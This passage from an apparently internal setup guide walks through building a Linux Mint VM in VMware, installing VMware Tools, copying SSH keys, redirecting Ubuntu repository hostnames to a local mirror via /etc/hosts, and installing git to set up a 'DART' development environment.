    8. Click on CD/DVD and select Use ISO image file – enter the local path to the Linux Mint 17.1 ISO here.  Once you are done tweaking the hardware and setting up the path to the ISO, click Close and then Finish
    9. Power on the new Virtual Machine.  The machine should automatically boot into the Live DVD Linux Mint environment.
    10. Once the Mint GUI loads (hey look – a traditional menu, taskbar and quick launch!), you should see a link to Install Linux Mint sitting on the desktop.  Double click the icon.
    11. Select your language then click Continue
    12. The next screen will probably complain about not having internet connectivity.  You can safely ignore this because we can use the Ubuntu repository mirrors on repo.devlan.net to pull updates and software later – just click Continue to proceed
    13. On the Installation Type screen, choose Erase disk and install Linux Mint (easy-mode) or, if you have a specific partitioning scheme in mind, Something else.  Check the other two options at your discretion.  Click Install Now when you are done futzing around.
    14. You'll get a dialog summarizing the changes that will be made to the disk.  If everything is to your liking, click Continue
    15. Pick your time zone, then click Continue
    16. Pick your keyboard layout, then click Continue
    17. The final screen of the wizard sets up your primary user and machine name.  This user will be automatically added to the sudoers file, so consider this your "admin" account.  Try to make the machine name somewhat unique to avoid collisions on the network.  By default, the name will be [username]-virtual-machine, which may be a little too generic if you build more than one Mint VM.  I recommend something like [username]-mint-DART-vm – that way if you have a 2nd Mint VM for other uses, you can just change DART to some other meaningful description.  Don't forget to set the password – it's required.  Click Continue when you are all done setting up your username and whatnot.
    18. Watch the installation proceed.  This should take maybe 5-10 minutes or so.  The system will try to reach out to several Mint and Ubuntu repos online, which slows things down a little, but we'll fix that later...
    19. When installation completes, click Continue Testing.  Click the Finished installing button on the VMware prompt at the bottom of the screen if it appears, then click Menu and select the Quit option (looks like a power button) to shutdown the VM.  Click Shutdown from the dialog that pops up.
    20. Once the VM shuts down, go to VM->Settings... on the VMware menu and change the CD/DVD drive from Use ISO image file to Use physical drive, then click OK
    21. Power on the VM and your newly installed Mint should boot
    Woot!  Now you have a working Mint VM.  You still need to do a couple things to get your DART setup completed.
    First of all, you're probably going to want to set up VMware Tools – drag and drop support is probably the cleanest way to copy your ssh keys to the system, so let's get that enabled.
    1. If a VMware prompt appears at the bottom of the screen after boot, click the Install Tools button.  Otherwise, go to VM->Install VMware Tools... from the VMware menu.
    2. When the contents of the VMware Tools CD appear in the VM, open a terminal window by clicking the terminal icon on the taskbar.  If you can't find it, click Menu and type terminal in the search box.
    3. In the terminal window, enter the following commands (replace username with your username):
      cp /media/username/VMware\ Tools/VMwareTools-*.tar.gz .
      tar xvzf VMwareTools-*.tar.gz
      cd vmware-tools-distrib
      sudo ./vmware-install.pl
    4. Enter your password to proceed with installation.  You can select the defaults for most of the prompts by simply pressing Enter – you may not care about Thinprint, so go ahead and type "no" there, but for all other prompts it is safe to go with the default.
    5. When the script is finished, type sudo /usr/bin/vmware-user to start the VMware Tools daemon, then log out of your X session by selecting Menu->Log Out (one button above the Quit button) and clicking Log Out on the dialog that appears.
    6. Log in again and verify that drag-and-drop is working by dragging something from your host to the VM.  If the file copies successfully, we can proceed to setting up your ssh keys.  Open the file manager by clicking the Files icon on the taskbar.   If you can't find it, click Menu and type files in the search box.
    7. Press CTRL+H to show hidden files – otherwise you may not be able to see your .ssh folder after copying it.  Navigate to your .ssh folder on the host and drag it into the file manager window.
    8. Double click into the newly copied .ssh folder.  Highlight all of the files and right click.  Select Properties from the popup menu, then click the Permissions tab.
    9. Change the Group and Other permissions to None, then click Allow executing file as program until the checkbox is cleared.  Click Close
    The next thing we need before we can set up DART is git.  Unfortunately, right now Mint wants to reach out to the interwebs to install everything.  A cheap way to fix this is to just trick it by editing the hosts file.  I'm sure there's a better way to do this that involves editing some obscure config file, but this is good enough for now.
    1. In your terminal window, type sudo vi /etc/hosts – or use nano in place of vi if you are a total noob (like User #7995631).
    2. Add the following two lines immediately after the two 127.0.0.1 entries and then save the file:
      10.2.0.222 archive.ubuntu.com
      10.2.0.222 security.ubuntu.com
    3. ping the two domains above to make sure the IPs are resolving properly.
    4. If the ping worked, then you can install Git by typing sudo apt-get install git
    5. Once git is installed, you can truck on over to https://stash.devlan.net/projects/TYR/repos/edg/browse and follow the instructions there to finish setting up your DART environment.  Note that on Step 6, the command should read:

      from ~/dart/tyrant/tyworkflow run ./bin/remote_commit -u run .plans.basic_plan
     Enjoy your non-sucky DART environment, and tell Ubuntu and Fedora to go pound sand with their annoying, tablet style GUIs.
    #getoffmylawn

Home pages:

